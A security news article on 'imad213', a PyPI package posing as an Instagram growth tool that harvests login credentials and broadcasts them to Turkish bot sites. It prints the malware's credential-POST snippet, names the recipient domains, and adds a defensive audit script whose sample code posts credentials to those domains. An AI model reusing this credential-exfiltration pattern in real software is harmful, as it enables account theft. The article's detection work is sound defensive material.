Beware of Instagram Growth Tool That Steals User Login Credentials & Sends Them to Attacker Servers

A sophisticated Python-based malware campaign has emerged targeting Instagram users desperate for social media growth, disguising itself as a legitimate follower-boosting tool while secretly harvesting login credentials.

The malicious PyPI package, identified as “imad213,” presents itself professionally on GitHub with detailed documentation advertising Instagram enhancement features, convincing unsuspecting users to download what they believe is a genuine growth service.

The malware employs advanced social engineering tactics, complete with professional branding and installation instructions that mirror legitimate software packages.


Users are instructed to simply run “pip install imad213” followed by the command “imad213” to begin boosting their follower counts.

imad213’s README on Github (Source – Socket.dev)

Socket.dev analysts identified this credential harvester as part of a broader attack toolkit created by threat actor “IMAD-213,” who operates under the email address [email protected] and maintains multiple malicious tools targeting different platforms.

The attack vector proves particularly dangerous because it exploits users’ desire for social media validation, a psychological vulnerability that makes victims more likely to ignore security warnings.

Once executed, the tool displays convincing “INSTA-FOLLOWERS” branding that reinforces users’ expectations, making them comfortable entering their actual Instagram credentials.

The malware implements a remote kill switch through a Netlify-hosted control file, allowing the attacker to maintain operational control over all deployed instances worldwide.

The scope of this campaign extends beyond individual credential theft, as compromised accounts face immediate policy violations under Instagram’s Terms of Use, potentially resulting in account suspension or permanent termination.

With Instagram’s 2 billion monthly active users representing a prime target, the platform’s engagement-driven algorithm has created a lucrative market for both legitimate and malicious growth services.

Credential Broadcast Network: The Hidden Danger

The most alarming aspect of this malware lies in its credential distribution mechanism, which broadcasts stolen login information to ten different Turkish bot services simultaneously.

After collecting Instagram usernames and passwords through a deceptive interface, the malware executes the following code structure:

import requests

# username, password, login_url and headers are set earlier in the tool;
# the anti-forgery token is a fixed value shipped inside the package.
login_data = {
    "username": username,
    "password": password,
    "userid": "",
    "antiForgeryToken": "5e65770c2420a986097445ab74b0e24b"
}
# Each third-party bot service receives the victim's credentials in a form POST.
session = requests.Session()
response = session.post(login_url, headers=headers, data=login_data)

Malicious website takipcimx[.]net (Source – Socket.dev)

This credential broadcast targets services including takipcimx.net, takipcizen.com, and bigtakip.net, all registered through the same Turkish telecom company within days of each other in June 2021.

The coordinated infrastructure suggests a sophisticated, long-term operation rather than opportunistic attacks, with all domains actively maintained and recently updated despite being operational for nearly four years.
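The two behaviours described above (a remote control file hosted on Netlify, and a loop that posts the collected username and password to a list of third-party hosts) are visible in a package's source before it is ever executed. The following is an added example, not Socket.dev's tooling or any code from the imad213 package: a small heuristic audit that a defender can run over the unpacked source of a PyPI package. The watchlist uses only the three domains named in this article; the sample source it is tested against is constructed for the example and the `.netlify.app` suffix check is a simplifying assumption based on the article's description of the kill switch.

```python
"""Static heuristic audit of a downloaded PyPI package's source files.

Added example for this article. It flags the combination of
(a) prompting the user for credentials, (b) calling .post() and
(c) contacting several external hosts or a host on the article's watchlist,
plus (d) any URL on a *.netlify.app host, which the article describes as the
location of the malware's remote control file.
"""
import re
from collections import Counter
from pathlib import Path

# Domains named in the article as recipients of the broadcast credentials.
KNOWN_BOT_HOSTS = {"takipcimx.net", "takipcizen.com", "bigtakip.net"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})[^\s'\"]*")
CRED_INPUT_RE = re.compile(
    r"\b(getpass\.getpass|input)\s*\(\s*['\"][^'\"]*(user|pass)[^'\"]*['\"]", re.I
)
POST_RE = re.compile(r"\.post\s*\(")


def audit_source(text: str) -> dict:
    """Return the indicators found in one source text and an overall verdict."""
    hosts = Counter(m.group(1).lower() for m in URL_RE.finditer(text))
    findings = {
        "hosts": sorted(hosts),
        "post_calls": len(POST_RE.findall(text)),
        "prompts_for_credentials": bool(CRED_INPUT_RE.search(text)),
        # Assumption: a control file served from a *.netlify.app host, as in the article.
        "remote_control_file": any(h.endswith(".netlify.app") for h in hosts),
        "known_bot_hosts": sorted(h for h in hosts if h in KNOWN_BOT_HOSTS),
    }
    # Credentials are collected AND posted AND go to a watchlisted host or to
    # several distinct hosts: the credential-broadcast pattern from the article.
    findings["suspicious"] = (
        findings["prompts_for_credentials"]
        and findings["post_calls"] >= 1
        and (bool(findings["known_bot_hosts"]) or len(findings["hosts"]) >= 3)
    )
    return findings


def audit_directory(root: str) -> dict:
    """Audit every .py file under root (e.g. a package fetched with pip download)."""
    return {str(p): audit_source(p.read_text(errors="replace"))
            for p in Path(root).rglob("*.py")}


# Constructed sample that mirrors the shape described in the article; it is
# not the real package's code and does nothing when imported as a string.
SAMPLE_SUSPICIOUS = '''
username = input("Username: ")
password = getpass.getpass("Password: ")
CONTROL = "https://example-control.netlify.app/status.txt"
for url in ["https://takipcimx.net/login", "https://takipcizen.com/login", "https://bigtakip.net/login"]:
    session.post(url, data={"username": username, "password": password})
'''

# Constructed benign sample: one GET to the package index, no credential prompt.
SAMPLE_BENIGN = '''
import requests
r = requests.get("https://pypi.org/simple/")
print(r.status_code)
'''

if __name__ == "__main__":
    for name, text in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, audit_source(text))
```

To audit a real package without installing it, fetch its source distribution first (`pip download --no-deps --no-binary :all: <package>`), unpack it, and point `audit_directory` at the unpacked tree. The heuristic is deliberately coarse: it is meant to surface packages worth a manual read, not to replace one, and a package that only talks to a single legitimate API will not trip it.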


Tushar Subhra Dutta
Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.